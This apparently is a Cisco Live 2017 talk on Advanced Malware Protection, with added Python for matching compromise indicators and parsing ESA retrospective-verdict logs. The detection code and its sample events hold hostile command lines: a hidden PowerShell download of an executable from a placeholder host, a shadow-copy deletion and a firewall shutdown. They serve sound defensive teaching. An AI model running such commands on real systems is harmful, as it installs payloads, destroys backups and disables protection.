Advanced Malware Protection (Live Berlin 2017, session BRKSEC-2139)
Transcript
Cisco Advanced Malware Protection (AMP) is designed to provide both defense and insight before, during, and after breach attempts. If you have struggled to find the point of exposure or the extent of a breach, this session will show how Cisco AMP helps to detect infections, understand scope, and initiate remediation for protected systems no matter where they are at any moment.
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Me …
Ivan BERLINSON
CISCO Advanced Threat Solutions
Southern Europe Security Engineer
Based in France
BRKSEC-2139 3
Does it protect their credit card account? Yes / No
Today we will talk about
• Some facts about malware
• How AMP helps with malware prevention
• Prevention alone is not enough: go further with detection and remediation
• How AMP works (demonstration)
• Q&A
Today we will NOT talk about
• AMP setup and Threat Grid integration
  • BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security
  • LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)
• CTA details
  • BRKSEC-2444 CTA - Detecting advanced malware with machine learning
Permanent innovation makes prevention a never-ending game
1. Cyber criminal organizations are like IT companies
2. Security companies innovate every day to protect you better
3. Cyber criminals innovate every day to breach you better
And thanks to financial efficiency, hackers can innovate every day
- Locky's victims per day*: 90,000
- Average ransom: 0.5 BTC to 1 BTC
- Ransom paid**: 2.9% of victims
Which adds up to: $1,093,590 / day, $32,807,700 / month, $393,892,400 / year
*Forbes **Talos "Angler Exposed" research
Timeline (2015 to 2016): Dridex; Locky V1 (.locky), V2 (.zepto), V3 (.odin)
Like multiple layers of obfuscation hiding malicious behavior from point-in-time protection systems
Infection chain as drawn on the slide:
1. Receipt_123412.doc arrives. Its VBA macro carries an XOR-encoded payload, inside which is a Base64-encoded payload, inside which is a packed PE32.
2. The PE32 is unpacked and executed by WinWord, launches Explorer.exe, and a DLL is dropped.
3. First set of behaviors: UAC bypass, kill and disable services, information stealing, C&C communication encrypted with RC4, drop and execute the Dridex payload.
4. The Dridex payload launches Calc.exe and another DLL is dropped.
5. Second set of behaviors: encrypt regular files, leave how-to-decrypt instructions, disable system recovery / delete backups, self-propagation / lateral movement.
And if Phase 1 is a success, then add new functions for more benefits
Malware is getting in. Prevention tools ALONE will never catch everything
Initial disposition = Clean, actual disposition = Bad: too late, and blind to the scope of compromise.
AV and IPS: <65% AV efficacy rate.
What gets past them: sleep techniques, unknown protocols, encryption, polymorphism. Analysis stops after the initial inspection.
Advanced Malware Protection - Unified by Threat
Attached controls, by vector: Network (ISR, NGIPS, NGFW, Meraki MX), Email (ESA, CES), Web (WSA, CWS), Host (Endpoint).
Each control sends file metadata to the AMP Cloud.
For your reference: detection engines
1-to-1 signatures
• SHA-256
• Cloud-enabled coverage
• Full signature database protection
Ethos engine** (generic signature engine)
• Catches polymorphic variants of a threat
Spero engine* (machine learning)
• Makes predictions based on application features
• Pipeline shown on the slide: data (including customer data) → feature vectors → machine learning algorithm → predictive model (decision trees, hypothesis) → disposition (Clean / Unknown / Malware); labels and performance monitoring feed back into the model, and a file's feature set is its "featureprint".
*Network and endpoint only
**Endpoint only
Advanced Malware Protection - Unified by Threat
Attached controls, by vector: Network (ISR, NGIPS, NGFW, Meraki MX), Email (ESA, CES), Web (WSA, CWS), Host (Endpoint).
The controls send file metadata to the AMP Cloud, which holds the TI database; samples go to Threat Grid for static and dynamic analysis, which returns a threat score.
Dynamic Analysis Engine - Cisco Threat Grid
• Unified malware analysis and TIP (threat intelligence platform)
• Proprietary static and dynamic analysis
• Human-readable behavior indicators
• Samples correlated with billions of artifacts
• Global / historical context on the threat landscape
• Threat intelligence feeds
Retrospective Engine
Real time: a file reputation query (SHA, SPERO, ETHOS, DFC) returns a response disposition.
Retrospective queue: files seen in the last 7 days are re-queried every hour (retrospective query, 20 min); when AMP or Threat Grid changes its verdict, a changed disposition is reported for the file.
Advanced Malware Protection - Unified by Threat
Attached controls, by vector: Network (ISR, NGIPS, NGFW, Meraki MX), Email (ESA, CES), Web (WSA, CWS), Host (Endpoint).
File metadata flows to the AMP Cloud (TI database) and samples to Threat Grid (static and dynamic analysis, threat score); the AMP Cloud is also connected to Cognitive Threat Analytics, ISE and OpenDNS Umbrella.
RET report, December 2016, total detections (for your reference)
Bar chart of detections by source (bar labels 75%, 35%, 75%, 36%, 57%, 33%, 63%, 32%; y axis 0 to 6,000,000):
Total: 5,322,833
Threat Grid: 110,289
Talos: 1,299,961
Third Party: 3,834,207
Others: 78,376
Demonstration: AMP on ESA
• Block by AMP File Reputation
• Block by AMP Dynamic File Analysis
• Detect by AMP Retrospection
Endpoint Detection and Response (EDR)
• Detect security incidents
• Contain the incident at the endpoint, such that network traffic or process execution can be remotely controlled
• Investigate security incidents
• Remediate endpoints
http://blogs.cisco.com/security/endpoint-protection-platform-epp-vs-endpoint-detection-response-edr
Continuous monitoring and event recording; visibility and remote control on the endpoint
To investigate a breach, you need to answer urgent questions: is there a breach and what happened?
Indications of compromise used to detect/block the breach (100+), drawn from:
• Vulnerability assessment
• Behavioral analysis
• Reputation check
• Low prevalence
• Dynamic analysis
• Command line capture
• Tetra AV engine
Example indicators shown on the slide: Adobe Reader / Word / PowerPoint / Excel / QuickTime / Java etc. compromise; Threat executed; Threat quarantined; Potential dropper; PowerShell downloaded executable; Possible ransomware shadow copy deletion; Netsh firewall disable.
More than 100 behaviors monitored!
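The indicator names on this slide (PowerShell downloaded executable, possible ransomware shadow copy deletion, Netsh firewall disable, Office / Reader application compromise) are the kind of thing command line capture feeds. The following Python is an added example and not AMP's IOC engine: it applies small rules carrying those indicator names to process events and groups the hits per host, which is the "is there a breach and what happened" view the slide asks for. The rule logic, host names, paths and command lines are all constructed assumptions, and real detection content is far broader.

```python
"""Command-line indicators of compromise in the style of the slide's IOC names.

Added example, not AMP's IOC engine. Rule logic, host names and the sample
process events are all constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Applications the slide names as common initial compromise points.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe",
               "quicktimeplayer.exe", "java.exe", "javaw.exe"}
# Interpreters an office document should never need to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b")
FW_OFF_RE = re.compile(r"\b(off|disable)\b")


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent: str    # parent process image name
    image: str     # this process's image name
    cmdline: str


# (indicator name, predicate over a lower-cased event); names follow the slide.
RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("Possible Ransomware Shadow Copy Deletion",
     lambda e: (e.image == "vssadmin.exe" and "delete" in e.cmdline and "shadows" in e.cmdline)
            or (e.image == "wmic.exe" and "shadowcopy" in e.cmdline and "delete" in e.cmdline)),
    ("Netsh Firewall Disable",
     lambda e: e.image == "netsh.exe" and "firewall" in e.cmdline
            and FW_OFF_RE.search(e.cmdline) is not None),
    ("Pwrshell Downloaded Executable",
     lambda e: e.image == "powershell.exe" and DOWNLOAD_RE.search(e.cmdline) is not None
            and ".exe" in e.cmdline),
    ("Office/Reader Application Compromise",
     lambda e: e.parent in OFFICE_APPS and e.image in SHELLS),
]


def match_iocs(event: ProcessEvent) -> List[str]:
    """Indicator names triggered by one process event (matching is case-insensitive)."""
    e = ProcessEvent(event.host, event.parent.lower(), event.image.lower(), event.cmdline.lower())
    return [name for name, rule in RULES if rule(e)]


def scan(events: List[ProcessEvent]) -> Dict[str, List[str]]:
    """Per host, the sorted set of indicators seen: which hosts and what happened."""
    found: Dict[str, set] = {}
    for ev in events:
        hits = match_iocs(ev)
        if hits:
            found.setdefault(ev.host, set()).update(hits)
    return {host: sorted(names) for host, names in found.items()}


# Constructed sample events (host names, paths and command lines are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent("ws-01", "WINWORD.EXE", "powershell.exe",
                 "powershell.exe -w hidden -c (New-Object Net.WebClient)"
                 ".DownloadFile('http://example.invalid/u.exe','u.exe')"),
    ProcessEvent("ws-01", "u.exe", "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ProcessEvent("ws-01", "u.exe", "netsh.exe", "netsh advfirewall set allprofiles state off"),
    # Benign administration on another host: no download, a listing rather than a deletion.
    ProcessEvent("ws-02", "explorer.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcessEvent("ws-02", "cmd.exe", "vssadmin.exe", "vssadmin.exe list shadows"),
]

if __name__ == "__main__":
    for host, names in scan(SAMPLE_EVENTS).items():
        print(host, names)
```

Each rule keys on the image name plus a few command line tokens, so a legitimate backup script or a `vssadmin list shadows` on ws-02 produces no indicator, while the chain on ws-01 (document spawns PowerShell, PowerShell fetches an executable, that executable deletes shadow copies and turns the firewall off) lights up four indicators on one host.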
To investigate a breach, you need to answer urgent questions: is there a breach and what happened?
Device Flow Correlation (DFC) records, per connection: timestamp, device IP/port/protocol, destination IP/port/protocol, URLs / domains, file downloads. These are matched in real time against Cisco-provided intelligence and custom-defined lists, producing alerts or blocks / process termination.
Cognitive Threat Analytics (CTA): processes Cisco WSA, Cisco CWS and Blue Coat logs.
To investigate a breach, you need to answer urgent questions:
• Is there a breach and what happened?
• Where did the malware come from and where has it been?
• What is it doing?
And you need to remediate. The fourth urgent question: how do we stop it?
Granular remediation and remote control
• Simple hash block
• Advanced signature (ClamAV)
• Application blocking
• Network communication blocking
• Host isolation
• Network/VLAN isolation
• Host/user privilege revocation
AMP on Endpoints
Malicious Behaviors detected on an Endpoint
Investigation and Remediation
Complete Your Online Session Evaluation
Don’t forget: Cisco Live sessions will be available for viewing on-demand after the event at CiscoLive.com/Online
• Please complete your Online Session Evaluations after each session
• Complete 4 Session Evaluations & the Overall Conference Evaluation (available from Thursday) to receive your Cisco Live T-shirt
• All surveys can be completed via the Cisco Live Mobile App or the Communication Stations
Continue Your Education
• Lunch & Learn
• Meet the Engineer 1:1 meetings
• BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security
• LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)
• BRKSEC-2444 Detecting advanced malware with machine learning
Thank You
“Logic will get you from point A to B,
Imagination will take you Everywhere”
- Albert Einstein
Demonstration: AMP on ESA
• Block by AMP File Reputation
• Block by AMP Dynamic File Analysis
• Detect by AMP Retrospection
• Tue Feb 14 12:26:07 2017 Info: Response received for file reputation query from Cloud. File Name = 'neup.exe', MID = 423, Disposition = FILE UNKNOWN, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 1
• Tue Feb 14 12:26:16 2017 Info: File uploaded for analysis. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, file name: neup.exe
• Tue Feb 14 12:36:31 2017 Info: File Analysis complete. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, File name: neup.exe, Disposition: 3 Score: 95, Spyname:[W32.E05774DA61-95.SBX.TG]
• Tue Feb 14 12:36:31 2017 Info: Response received for file reputation query from Cache. File Name = 'neup.exe', MID = 423, Disposition = MALICIOUS, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 2
• Tue Feb 14 13:52:03 2017 Info: Retrospective verdict received. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.E05774DA61-95.SBX.TG
• Tue Feb 14 10:42:07 2017 Info: Response received for file reputation query from Cloud. File Name = spoolup8.exe, MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…, upload_action = 1
• Tue Feb 14 10:42:10 2017 Info: File uploaded for analysis. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, file name: spoolup8.exe
• Tue Feb 14 10:51:32 2017 Info: File Analysis complete. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, File name: spoolup8.exe, Disposition: 1 Score: 56,
• Tue Feb 14 10:51:32 2017 Info: Response received for file reputation query from Cache. File Name = 'spoolup8.exe', MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…., upload_action = 2
• Tue Feb 14 12:52:02 2017 Info: Retrospective verdict received. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a….., Timestamp: 1487073121.71, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.94D523DC03-73.SBX.VIOC
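The retrospective engine slide and the two ESA log excerpts above describe the same sequence: a file is queried at delivery time, gets a disposition, may be uploaded for analysis, and can later receive a retrospective verdict that changes that disposition. The message has been delivered by then, so the case an ESA administrator has to chase is "delivered as UNKNOWN (or clean), later turned MALICIOUS". The following Python is an added example, not Cisco's code and not an official ESA log grammar: its regexes are fitted to the excerpts as an assumption, and the sample lines are constructed from the slide's format with placeholder hashes (the file names, message IDs and timestamps are taken from the excerpts). It also tolerates the hash truncation the slide shows by matching on prefix.

```python
"""Spot retrospective disposition changes in Cisco ESA AMP log lines.

Added example, not Cisco code. Line formats follow the slide's ESA log
excerpts; the regexes are assumptions fitted to those excerpts, and the
sample lines below are constructed, with placeholder hashes.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

TS_FMT = "%a %b %d %H:%M:%S %Y"
TS = r"(?P<ts>\w{3} \w{3} \d{1,2} \d{2}:\d{2}:\d{2} \d{4}) Info: "

# Delivery-time reputation lookup (answered from Cloud or the local Cache).
REPUTATION_RE = re.compile(
    TS + r"Response received for file reputation query from (?P<src>\w+)\. "
    r"File Name = '?(?P<name>[^',]+)'?, MID = (?P<mid>\d+), "
    r"Disposition = (?P<disp>[A-Z ]+), sha256 = (?P<sha>[0-9a-f]+)")
# Sandbox (Threat Grid) result for an uploaded sample.
ANALYSIS_RE = re.compile(
    TS + r"File Analysis complete\. SHA256: (?P<sha>[0-9a-f]+), "
    r"File name: (?P<name>[^,]+), Disposition: (?P<code>\d+) Score: (?P<score>\d+)")
# Verdict pushed later by the retrospective engine.
RETRO_RE = re.compile(
    TS + r"Retrospective verdict received\. SHA256: (?P<sha>[0-9a-f]+).*?"
    r"Verdict: (?P<verdict>[A-Z]+)")


@dataclass
class FileHistory:
    sha: str
    name: str = ""
    mid: Optional[int] = None
    first_seen: Optional[datetime] = None        # time of the first reputation query
    initial_disposition: Optional[str] = None    # what the ESA acted on at delivery
    sandbox_score: Optional[int] = None
    retro_verdict: Optional[str] = None
    retro_time: Optional[datetime] = None


def _same_sha(a: str, b: str) -> bool:
    """Equal hashes, or one is a prefix of the other (the slide truncates some)."""
    return a.startswith(b) or b.startswith(a)


def _history(store: Dict[str, FileHistory], sha: str) -> FileHistory:
    """Find the record for this hash (by prefix if needed), keeping the longest form as key."""
    for key, hist in store.items():
        if _same_sha(key, sha):
            if len(sha) > len(key):
                store[sha] = store.pop(key)
                hist.sha = sha
            return hist
    store[sha] = FileHistory(sha=sha)
    return store[sha]


def parse_amp_log(lines: List[str]) -> Dict[str, FileHistory]:
    """Fold log lines into one FileHistory per SHA-256."""
    store: Dict[str, FileHistory] = {}
    for raw in lines:
        line = raw.strip().lstrip("•").strip()    # tolerate the slide's bullet prefix
        if (m := REPUTATION_RE.match(line)):
            hist = _history(store, m["sha"])
            hist.name, hist.mid = m["name"], int(m["mid"])
            if hist.first_seen is None:           # keep the verdict the message was delivered under
                hist.first_seen = datetime.strptime(m["ts"], TS_FMT)
                hist.initial_disposition = m["disp"].strip()
        elif (m := ANALYSIS_RE.match(line)):
            _history(store, m["sha"]).sandbox_score = int(m["score"])
        elif (m := RETRO_RE.match(line)):
            hist = _history(store, m["sha"])
            hist.retro_verdict = m["verdict"]
            hist.retro_time = datetime.strptime(m["ts"], TS_FMT)
    return store


def retrospective_changes(store: Dict[str, FileHistory]) -> List[dict]:
    """Files delivered as anything but MALICIOUS that later got a MALICIOUS retrospective verdict."""
    changes = []
    for hist in store.values():
        if hist.retro_verdict == "MALICIOUS" and hist.initial_disposition != "MALICIOUS":
            minutes = None
            if hist.first_seen and hist.retro_time:
                minutes = (hist.retro_time - hist.first_seen).total_seconds() / 60
            changes.append({"sha": hist.sha, "name": hist.name, "mid": hist.mid,
                            "delivered_as": hist.initial_disposition,
                            "sandbox_score": hist.sandbox_score,
                            "minutes_to_verdict": minutes})
    return changes


# Constructed sample: placeholder hashes; names, MIDs and times patterned on the slide.
SHA_A, SHA_B, SHA_C = "a" * 64, "b" * 64, "c" * 64
SAMPLE_LOG = [
    f"Tue Feb 14 12:26:07 2017 Info: Response received for file reputation query from Cloud. File Name = 'neup.exe', MID = 423, Disposition = FILE UNKNOWN, sha256 = {SHA_A[:32]}...., upload_action = 1",
    f"Tue Feb 14 12:26:16 2017 Info: File uploaded for analysis. SHA256: {SHA_A}, file name: neup.exe",
    f"Tue Feb 14 12:36:31 2017 Info: File Analysis complete. SHA256: {SHA_A}, File name: neup.exe, Disposition: 3 Score: 95",
    f"Tue Feb 14 12:36:31 2017 Info: Response received for file reputation query from Cache. File Name = 'neup.exe', MID = 423, Disposition = MALICIOUS, sha256 = {SHA_A[:32]}...., upload_action = 2",
    f"Tue Feb 14 13:52:03 2017 Info: Retrospective verdict received. SHA256: {SHA_A}, Verdict: MALICIOUS, Reputation Score: 0",
    f"Tue Feb 14 10:42:07 2017 Info: Response received for file reputation query from Cloud. File Name = spoolup8.exe, MID = 401, Disposition = FILE UNKNOWN, sha256 = {SHA_B}, upload_action = 1",
    f"Tue Feb 14 10:51:32 2017 Info: File Analysis complete. SHA256: {SHA_B}, File name: spoolup8.exe, Disposition: 1 Score: 56,",
    f"Tue Feb 14 10:51:32 2017 Info: Response received for file reputation query from Cache. File Name = 'spoolup8.exe', MID = 401, Disposition = FILE UNKNOWN, sha256 = {SHA_B}, upload_action = 2",
    f"Tue Feb 14 12:52:02 2017 Info: Retrospective verdict received. SHA256: {SHA_B}, Timestamp: 1487073121.71, Verdict: MALICIOUS, Reputation Score: 0",
    # Blocked at delivery: known bad, so no retrospective follow-up is needed.
    f"Tue Feb 14 11:00:00 2017 Info: Response received for file reputation query from Cloud. File Name = 'blocked.exe', MID = 410, Disposition = MALICIOUS, sha256 = {SHA_C}",
]

if __name__ == "__main__":
    for change in retrospective_changes(parse_amp_log(SAMPLE_LOG)):
        print(change)
```

Both sample files were delivered under FILE UNKNOWN and later flagged MALICIOUS, roughly 86 and 130 minutes after the first query, so both appear in the output with their MID for tracking the message down; the file blocked at delivery does not. Note that the second file's sandbox score (56) did not change its cached disposition at all, and only the retrospective verdict caught it, which is the point the "Detect by AMP Retrospection" demonstration makes.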